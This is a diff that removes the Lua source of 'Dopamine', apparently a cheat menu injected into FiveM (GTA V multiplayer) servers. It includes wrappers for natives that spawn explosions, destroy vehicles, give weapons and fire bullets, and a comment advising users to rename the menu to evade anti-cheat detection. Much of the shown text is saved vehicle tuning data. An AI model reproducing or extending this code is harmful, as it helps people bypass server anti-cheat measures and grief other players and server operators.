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- local Keys = {
- ['ESC'] = 322, ['F1'] = 288, ['F2'] = 289, ['F3'] = 170, ['F5'] = 166, ['F6'] = 167, ['F7'] = 168, ['F8'] = 169, ['F9'] = 56, ['F10'] = 57,
- ['~'] = 243, ['1'] = 157, ['2'] = 158, ['3'] = 160, ['4'] = 164, ['5'] = 165, ['6'] = 159, ['7'] = 161, ['8'] = 162, ['9'] = 163, ['-'] = 84, ['='] = 83, ['BACKSPACE'] = 177,
- ['TAB'] = 37, ['Q'] = 44, ['W'] = 32, ['E'] = 38, ['R'] = 45, ['T'] = 245, ['Y'] = 246, ['U'] = 303, ['P'] = 199, ['['] = 39, [']'] = 40, ['ENTER'] = 18,
- ['CAPS'] = 137, ['A'] = 34, ['S'] = 8, ['D'] = 9, ['F'] = 23, ['G'] = 47, ['H'] = 74, ['K'] = 311, ['L'] = 182,
- ['LEFTSHIFT'] = 21, ['Z'] = 20, ['X'] = 73, ['C'] = 26, ['V'] = 0, ['B'] = 29, ['N'] = 249, ['M'] = 244, [','] = 82, ['.'] = 81,
- ['LEFTCTRL'] = 36, ['LEFTALT'] = 19, ['SPACE'] = 22, ['RIGHTCTRL'] = 70,
- ['HOME'] = 213, ['PAGEUP'] = 10, ['PAGEDOWN'] = 11, ['DELETE'] = 178,
- ['LEFT'] = 174, ['RIGHT'] = 175, ['TOP'] = 27, ['UP'] = 172, ['DOWN'] = 173,
- ['NENTER'] = 201, ['N4'] = 108, ['N5'] = 60, ['N6'] = 107, ['N+'] = 96, ['N-'] = 97, ['N7'] = 117, ['N8'] = 61, ['N9'] = 118,
- ['MOUSE1'] = 24
- }
- local old_print = print
- local function dir_print(trash)
- old_print('[d0pamine] '..trash)
- end
- local function intToFloat(_value)
- if _value then
- return _value + .0;
- else
- return 5391.0;
- end
- end
- local pCreateThread = Citizen.CreateThread
- local pWait = Citizen.Wait
- local pInvoke = Citizen.InvokeNative
- local p_tostring = function(num)
- if num == 0 or not num then
- return nil
- end
- return tostring(num)
- end
- local Dopamine = { --[[rename `Dopamine` to whatever the fuck you want and ez undetek]]
- shouldShowMenu = true,
- debug = false,
- natives = {
- getCurrentServerEndpoint = function() --[[GetCurrentServerEndpoint]]
- return (pInvoke(" 0xea11bfba ", Citizen.ReturnResultAnyway(), Citizen.ResultAsString()))
- end,
- getCurrentResourceName = function() --[[GetCurrentResourceName]]
- return (pInvoke(" 0xe5e9ebbb ", Citizen.ReturnResultAnyway(), Citizen.ResultAsString()))
- end,
- getActivePlayers = function() --[[GetActivePlayers]]
- return (msgpack.unpack(pInvoke(" 0xcf143fb9 ", Citizen.ReturnResultAnyway(), Citizen.ResultAsObject())))
- end,
- clearPedTasksImmediately = function(ped) --[[ClearPedTasksImmediately]]
- return (pInvoke(" 0xAAA34F8A7CB32098 ", ped))
- end,
- addTextComponentSubstringPlayerName = function(text) --[[AddTextComponentSubstringPlayerName]]
- return (pInvoke(" 0x6C188BE134E074AA ", tostring(text)))
- end,
- beginTextCommandDisplayText = function(text) --[[BeginTextCommandDisplayText / SetTextEntry]]
- return (pInvoke(" 0x25FBB336DF1804CB ", tostring(text)))
- end,
- endTextCommandDisplayText = function(x, y) --[[EndTextCommandDisplayText / DrawText]]
- return (pInvoke(" 0xCD015E5BB0D96A57 ", x, y))
- end,
- loadResourceFile = function(resourceName, fileName) --[[LoadResourceFile]]
- return (pInvoke(" 0x76a9ee1f ", tostring(resourceName), tostring(fileName), Citizen.ReturnResultAnyway(), Citizen.ResultAsString()))
- end,
- createObject = function(modelHash, x, y, z, isNetwork, netMissionEntity, dynamic) --[[CreateObject]]
- return (pInvoke(" 0x509D5878EB39E842 ", modelHash, x, y, z, isNetwork, thisScriptCheck, dynamic, Citizen.ReturnResultAnyway(), Citizen.ResultAsInteger()))
- end,
- drawRect = function(x, y, width, height, r, g, b, a) --[[DrawRect]]
- return (pInvoke(" 0x3A618A217E5154F0 ", x, y, width, height, r, g, b, a))
- end,
- addExplosion = function(x, y, z, explosionType, damageScale, isAudible, isInvisible, cameraShake) --[[AddExplosion]]
- return (pInvoke(" 0xE3AD2BDBAEE269AC ", x, y, z, explosionType, damageScale, isAudible, isInvisible, cameraShake))
- end,
- networkExplodeVehicle = function(vehicle, isAudible, isInvisible, p3) --[[NetworkExplodeVehicle]]
- return (pInvoke(" 0x301A42153C9AD707 ", vehicle, isAudible, isInvisible, p3, Citizen.ReturnResultAnyway(), Citizen.ResultAsInteger()))
- end,
- giveWeaponToPed = function(ped, weaponHash, ammoCount, isHidden, equipNow) --[[GiveWeaponToPed]]
- return (pInvoke(" 0xBF0FD6E56C964FCB ", ped, weaponHash, ammoCount, isHidden, equipNow))
- end,
- addTextEntry = function(entryKey, entryText) --[[AddTextEntry]]
- return (pInvoke(" 0x32ca01c3 ", tostring(entryKey), tostring(entryText)))
- end,
- displayOnscreenKeyboard = function(p0, windowTitle, p2, defaultText, defaultConcat1, defaultConcat2, defaultConcat3, maxInputLength) --[[DisplayOnscreenKeyboard]]
- return (pInvoke(" 0x00DC833F2568DBF6 ", p0, tostring(windowTitle), tostring(p2), tostring(defaultText), tostring(defaultConcat1), tostring(defaultConcat2), tostring(defaultConcat3), maxInputLength))
- end,
- updateOnscreenKeyboard = function() --[[UpdateOnscreenKeyboard]]
- return (pInvoke(" 0x0CF2B696BBF945AE ", Citizen.ReturnResultAnyway(), Citizen.ResultAsInteger()))
- end,
- getVehicleXenonLightsColour = function(vehicle) --[[GetVehicleXenonLightsColour]]
- return (pInvoke(" 0x3DFF319A831E0CDB ", vehicle, Citizen.ReturnResultAnyway(), Citizen.ResultAsInteger()))
- end,
- setVehicleXenonLightsColour = function(vehicle, color) --[[SetVehicleXenonLightsColour]]
- return (pInvoke(" 0xE41033B25D003A07 ", vehicle, color))
- end,
- doesExtraExist = function(vehicle, extraId) --[[DoesExtraExist]]
- return (pInvoke(" 0x1262D55792428154 ", vehicle, extraId, Citizen.ReturnResultAnyway()))
- end,
- setEntityVisible = function(entity, toggle, unk) --[[SetEntityVisible]]
- return (pInvoke(" 0xEA1C610A04DB6BBB ", entity, toggle, unk))
- end,
- createVehicle = function(modelHash, x, y, z, heading, isNetwork, thisScriptCheck) --[[CreateVehicle]]
- return (pInvoke(" 0xAF35D0D2583051B0 ", modelHash, x, y, z, heading, isNetwork, thisScriptCheck, Citizen.ReturnResultAnyway(), Citizen.ResultAsInteger()))
- end,
- setEntityCoords = function(entity, xPos, yPos, zPos, xAxis, yAxis, zAxis, clearArea) --[[SetEntityCoords]]
- return (pInvoke(" 0x06843DA7060A026B ", entity, xPos, yPos, zPos, xAxis, yAxis, zAxis, clearArea))
- end,
- setEntityCoordsNoOffset = function(entity, xPos, yPos, zPos, xAxis, yAxis, zAxis) --[[SetEntityCoordsNoOffset]]
- return (pInvoke(" 0x239A3351AC1DA385 ", entity, xPos, yPos, zPos, xAxis, yAxis, zAxis))
- end,
- shootSingleBulletBetweenCoords = function(x1, y1, z1, x2, y2, z2, damage, p7, weaponHash, ownerPed, isAudible, isInvisible, speed) --[[ShootSingleBulletBetweenCoords]]
- return (pInvoke(" 0x867654CBC7606F2C ", x1, y1, z1, x2, y2, z2, damage, p7, GetHashKey(weaponHash), ownerPed, isAudible, isInvisible, speed))
- end,
- setEntityHealth = function(entity, health) --[[SetEntityHealth]]
- return (pInvoke(" 0x6B76DC1F3AE6E6A3 ", entity, health))
- end,
- setPedArmour = function(ped, amount) --[[SetPedArmour]]
- return (pInvoke(" 0xCEA04D83135264CC ", ped, amount))
- end,
- setTextFont = function(fontType) --[[SetTextFont]]
- return (pInvoke(" 0x66E0276CC5F6B9DA ", fontType))
- end,
- setTextColour = function(red, green, blue, alpha) --[[SetTextColour]]
- return (pInvoke(" 0xBE6B23FFA53FB442 ", red, green, blue, alpha))
- end,
- setTextScale = function(scale, size) --[[SetTextScale]]
- return (pInvoke(" 0x07C837F9A01C34C9 ", scale, size))
- end,
- setTextDropShadow = function() --[[SetTextDropShadow]]
- return (pInvoke(" 0x1CA3E9EAC9D93E5E "))
- end,
- playSoundFrontend = function(soundId, audioName, audioRef, p3) --[[PlaySoundFrontend]]
- return (pInvoke(" 0x67C540AA08E4A6F5 ", soundId, tostring(audioName), tostring(audioRef), p3))
- end,
- requestStreamedTextureDict = function(textureDict, p1) --[[RequestStreamedTextureDict]]
- return (pInvoke(" 0xDFA2EF8E04127DD5 ", tostring(textureDict), p1))
- end,
- setTextProportional = function(p0) --[[SetTextProportional]]
- return (pInvoke(" 0x038C1F517D7FDCF8 ", p0))
- end,
- setTextOutline = function() --[[SetTextOutline]]
- return (pInvoke(" 0x2513DFB0FB8400FE "))
- end,
- isDisabledControlPressed = function(inputGroup, control) --[[IsDisabledControlPressed]]
- return (pInvoke(" 0xE2587F8CBBD87B1D ", inputGroup, control, Citizen.ReturnResultAnyway()))
- end,
- setArtificialLightsState = function(state)
- return (pInvoke(" 0x1268615ACE24D504 ", state))
- end
- },
- menuProps = {
- shitMenus = {},
- keys = { up = Keys['UP'], down = Keys['DOWN'], left = Keys['LEFT'], right = Keys['RIGHT'], select = Keys['NENTER'], back = 202 },
- optionCount = 0,
- maximumOptionCount = 12,
- currentKey = nil,
- currentMenu = nil,
- titleHeight = 0.11,
- titleYOffset = 0.05,
- titleXOffset = 0.5,
- titleScale = 1.0,
- titleSpacing = 2,
- buttonHeight = 0.038,
- buttonFont = 0,
- buttonScale = 0.365,
- _mVersion = 'b1.3.9',
- buttonTextYOffset = 0.005,
- buttonTextXOffset = 0.005,
- selectedThemeRainbow = false,
- selectedCheckboxStyle = 'New',
- availableCheckboxStyles = {'New', 'Old'},
- menu_TextOutline = false,
- menu_TextDropShadow = true,
- menu_RectOverlay = true,
- selectedTheme = 'Classic',
- availableThemes = {'Dark', 'Light', 'Classic'},
- rainbowInt = 0,
- },
- functions = {},
- trashFunctions = {},
- trashTables = {},
- menus_list = {},
- cachedNotifications = {},
- datastore = {
- pLocalPlayer = {
- cVehicle = 0,
- pedId = 0,
- should2stepAutist = false,
- },
- es_extended = nil,
- ESX = nil,
- trainRide = {
- handleHasLoaded = true,
- handle = nil,
- oldCoords = nil,
- trainSpeed = 5.0,
- },
- savedVehicles = {
- {name = 'Nertigel\'s Elegy Retro Custom', props = {["modDashboard"] = 1,["modTransmission"] = 2,["modLivery"] = 4,["modFrame"] = 4,["modWindows"] = 0,["modTank"] = 1,["dirtLevel"] = 10.8,["modArmor"] = 4,["wheels"] = 0,["modFrontWheels"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["modBrakes"] = 2,["modPlateHolder"] = 0,["modArchCover"] = -1,["wheelColor"] = 134,["pearlescentColor"] = 12,["modVanityPlate"] = 2,["modStruts"] = 11,["bodyHealth"] = 1000.0,["modAirFilter"] = 1,["modEngineBlock"] = 1,["modRightFender"] = -1,["modFender"] = 1,["modHydrolic"] = -1,["modAerials"] = 6,["modSpeakers"] = -1,["modSuspension"] = 3,["modTrimA"] = 0,["modEngine"] = 3,["modShifterLeavers"] = -1,["modSteeringWheel"] = 9,["modSeats"] = 0,["model"] = 196747873,["color1"] = 12,["modRearBumper"] = 1,["modDoorSpeaker"] = 4,["modSpoilers"] = 2,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSmokeEnabled"] = 1,["windowTint"] = 1,["plateIndex"] = 1,["modGrille"] = 0,["modTrunk"] = -1,["modAPlate"] = -1,["engineHealth"] = 1000.0,["modXenon"] = 1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modHorns"] = -1,["modHood"] = 4,["fuelLevel"] = 65.0,["modTurbo"] = 1,["modBackWheels"] = -1,["modRoof"] = 0,["modOrnaments"] = -1,["extras"] = { } ,["modTrimB"] = 0,["modFrontBumper"] = -1,["modExhaust"] = 2,["color2"] = 12,["modDial"] = 2,["xenonColor"] = 255,["modSideSkirt"] = 4,}},
- {name = 'Nertigel\'s Jester Classic', props = {["modFrame"] = 2,["modTransmission"] = 2,["modRoof"] = 0,["modLivery"] = 1,["color1"] = 12,["modWindows"] = -1,["modTank"] = -1,["modSideSkirt"] = 0,["modSpeakers"] = -1,["wheels"] = 0,["modAerials"] = -1,["dirtLevel"] = 6.2,["modArchCover"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modStruts"] = -1,["modBackWheels"] = -1,["engineHealth"] = 1000.0,["modSuspension"] = 4,["modTurbo"] = 1,["modAirFilter"] = -1,["modEngineBlock"] = -1,["modHydrolic"] = -1,["modOrnaments"] = -1,["modEngine"] = 3,["modHood"] = 2,["fuelLevel"] = 65.0,["modTrunk"] = -1,["modRightFender"] = -1,["modTrimB"] = -1,["modFrontBumper"] = 8,["modShifterLeavers"] = -1,["wheelColor"] = 12,["model"] = -214906006,["modFrontWheels"] = 8,["windowTint"] = 1,["bodyHealth"] = 1000.0,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSeats"] = -1,["modHorns"] = -1,["modRearBumper"] = -1,["modDoorSpeaker"] = -1,["modBrakes"] = 2,["modDial"] = -1,["modSmokeEnabled"] = 1,["modGrille"] = -1,["modFender"] = 0,["modTrimA"] = -1,["modVanityPlate"] = -1,["modPlateHolder"] = -1,["plateIndex"] = 1,["modSteeringWheel"] = -1,["modXenon"] = 1,["color2"] = 12,["modArmor"] = 4,["modDashboard"] = -1,["pearlescentColor"] = 12,["extras"] = { } ,["modExhaust"] = 3,["modAPlate"] = -1,["xenonColor"] = 255,["modSpoilers"] = 0,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,}},
- {name = 'Nertigel\'s Schwartzer', props = {["color2"] = 12,["modBackWheels"] = -1,["bodyHealth"] = 1000.0,["modLivery"] = -1,["modArchCover"] = -1,["wheelColor"] = 12,["modTank"] = -1,["modXenon"] = 1,["modAerials"] = -1,["modOrnaments"] = -1,["modWindows"] = -1,["modStruts"] = -1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modAirFilter"] = -1,["modEngineBlock"] = -1,["modHydrolic"] = -1,["modFender"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["dirtLevel"] = 5.1,["modArmor"] = 4,["modHorns"] = -1,["modAPlate"] = -1,["modTrunk"] = -1,["modShifterLeavers"] = -1,["modPlateHolder"] = -1,["model"] = -746882698,["modSpeakers"] = -1,["extras"] = { ["10"] = false,["12"] = false,} ,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modHood"] = -1,["modRoof"] = -1,["modEngine"] = 3,["modTrimA"] = -1,["modFrame"] = 0,["modFrontBumper"] = 1,["modExhaust"] = 2,["modSteeringWheel"] = -1,["modFrontWheels"] = 25,["color1"] = 12,["modTrimB"] = -1,["modSmokeEnabled"] = 1,["windowTint"] = 1,["modSeats"] = -1,["fuelLevel"] = 65.0,["modSpoilers"] = 0,["modSuspension"] = 2,["modTransmission"] = 2,["plateIndex"] = 1,["modBrakes"] = 2,["modDashboard"] = -1,["modRightFender"] = -1,["wheels"] = 7,["modSideSkirt"] = 0,["modDial"] = -1,["modRearBumper"] = 0,["modGrille"] = 0,["modVanityPlate"] = -1,["modDoorSpeaker"] = -1,["pearlescentColor"] = 12,["xenonColor"] = 255,["modTurbo"] = 1,["engineHealth"] = 1000.0,}},
- {name = 'Alfa Romeo Giulia QV', props = {["modLivery"] = 0,["xenonColor"] = 255,["model"] = 433374210,["extras"] = { ["11"] = true,} ,["modTurbo"] = 1,["suspensionRaise"] = 2.2351741291171e-10,["dirtLevel"] = 6.8,["modWindows"] = -1,["bodyHealth"] = 1000.0,["modTransmission"] = 2,["modSideSkirt"] = -1,["modHood"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSmokeEnabled"] = 1,["modArchCover"] = -1,["modTrimA"] = -1,["engineHealth"] = 1000.0,["modAirFilter"] = -1,["modTrimB"] = -1,["modAerials"] = -1,["modStruts"] = -1,["modGrille"] = -1,["modHydrolic"] = -1,["pearlescentColor"] = 12,["modTrunk"] = -1,["modSpeakers"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["modDial"] = -1,["modSeats"] = -1,["fuelLevel"] = 60.0,["modArmor"] = 4,["modSteeringWheel"] = -1,["modShifterLeavers"] = -1,["modFrontWheels"] = -1,["modAPlate"] = -1,["modXenon"] = 1,["windowTint"] = 4,["modFrame"] = -1,["modDashboard"] = -1,["modOrnaments"] = -1,["color2"] = 31,["wheels"] = 0,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modBackWheels"] = -1,["modSuspension"] = 3,["modPlateHolder"] = -1,["modDoorSpeaker"] = -1,["modRightFender"] = -1,["modBrakes"] = 2,["modEngine"] = 3,["modFender"] = -1,["color1"] = 12,["modExhaust"] = -1,["modRoof"] = -1,["modHorns"] = -1,["modTank"] = -1,["modSpoilers"] = -1,["plateIndex"] = 1,["wheelColor"] = 156,["modEngineBlock"] = -1,["modRearBumper"] = -1,["modVanityPlate"] = -1,["modFrontBumper"] = -1,}},
- {name = 'Aston Martin DBS 2008', props = {["modLivery"] = -1,["xenonColor"] = 255,["model"] = -1131896028,["extras"] = { } ,["modTurbo"] = 1,["suspensionRaise"] = -0.019999995827675,["dirtLevel"] = 3.8,["modWindows"] = -1,["bodyHealth"] = 1000.0,["modTransmission"] = 2,["modSideSkirt"] = -1,["modHood"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSmokeEnabled"] = 1,["modArchCover"] = -1,["modTrimA"] = -1,["engineHealth"] = 1000.0,["modAirFilter"] = -1,["modTrimB"] = -1,["modAerials"] = -1,["modStruts"] = -1,["modGrille"] = -1,["modHydrolic"] = -1,["pearlescentColor"] = 12,["modTrunk"] = -1,["modSpeakers"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["modDial"] = -1,["modSeats"] = -1,["fuelLevel"] = 60.0,["modArmor"] = 4,["modSteeringWheel"] = -1,["modShifterLeavers"] = -1,["modFrontWheels"] = 9,["modAPlate"] = -1,["modXenon"] = 1,["windowTint"] = 1,["modFrame"] = -1,["modDashboard"] = -1,["modOrnaments"] = -1,["color2"] = 2,["wheels"] = 7,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modBackWheels"] = -1,["modSuspension"] = 3,["modPlateHolder"] = -1,["modDoorSpeaker"] = -1,["modRightFender"] = -1,["modBrakes"] = 2,["modEngine"] = 3,["modFender"] = -1,["color1"] = 83,["modExhaust"] = -1,["modRoof"] = -1,["modHorns"] = -1,["modTank"] = -1,["modSpoilers"] = -1,["plateIndex"] = 1,["wheelColor"] = 12,["modEngineBlock"] = -1,["modRearBumper"] = -1,["modVanityPlate"] = -1,["modFrontBumper"] = -1,}},
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- {name = 'Bentley Continental GT 2013', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = -1,["suspensionRaise"] = -0.03999999910593,["fuelLevel"] = 60.0,["modLivery"] = -1,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = -1,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 8.0,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = 899312186,["modAPlate"] = -1,["modHood"] = -1,["wheelColor"] = 122,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = -1,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["1"] = true,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = -1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = 0,["color2"] = 88,["modFrame"] = 0,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 0,["modAerials"] = -1,}},
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- {name = 'BMW M8', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = -1,["suspensionRaise"] = 0.0049999998882413,["fuelLevel"] = 60.0,["modLivery"] = 0,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = -1,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 3.6,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = -1404319008,["modAPlate"] = -1,["modHood"] = -1,["wheelColor"] = 28,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = -1,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["10"] = true,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = -1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = 3,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 28,["modFrame"] = -1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = -1,["modAerials"] = -1,}},
- {name = 'BMW X6M', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 0,["suspensionRaise"] = -0.12999999523163,["fuelLevel"] = 60.0,["modLivery"] = 1,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 3.6,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = -506359117,["modAPlate"] = -1,["modHood"] = 0,["wheelColor"] = 12,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 1,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["1"] = true,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 3,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = 0,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 28,["modFrame"] = -1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 0,["modAerials"] = -1,}},
- {name = 'Chevrolet Corvette C7', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 1,["suspensionRaise"] = -0.059999998658895,["fuelLevel"] = 60.0,["modLivery"] = 0,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 6.4,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = 874739883,["modAPlate"] = -1,["modHood"] = 0,["wheelColor"] = 12,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = -1,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["1"] = true,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 134,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = 0,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 4,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 134,["modFrame"] = 0,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 2,["modAerials"] = -1,}},
- {name = 'Dodge Challenger 2016', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 5,["suspensionRaise"] = 0.0,["fuelLevel"] = 60.0,["modLivery"] = 0,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = 0,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 7.5,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = -216150906,["modAPlate"] = -1,["modHood"] = 4,["wheelColor"] = 12,["modRightFender"] = 0,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 0,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["1"] = false,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 28,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = 2,["modPlateHolder"] = -1,["modRearBumper"] = -1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 4,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = 0,["color2"] = 28,["modFrame"] = 0,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 4,["modAerials"] = -1,}},
- {name = 'Dodge Charger 2016', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 6,["suspensionRaise"] = 0.0,["fuelLevel"] = 60.0,["modLivery"] = 4,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 5.2,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = -1513691047,["modAPlate"] = -1,["modHood"] = 0,["wheelColor"] = 12,["modRightFender"] = 1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 2,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { } ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = 1,["modPlateHolder"] = -1,["modRearBumper"] = -1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 28,["modFrame"] = -1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 0,["modAerials"] = -1,}},
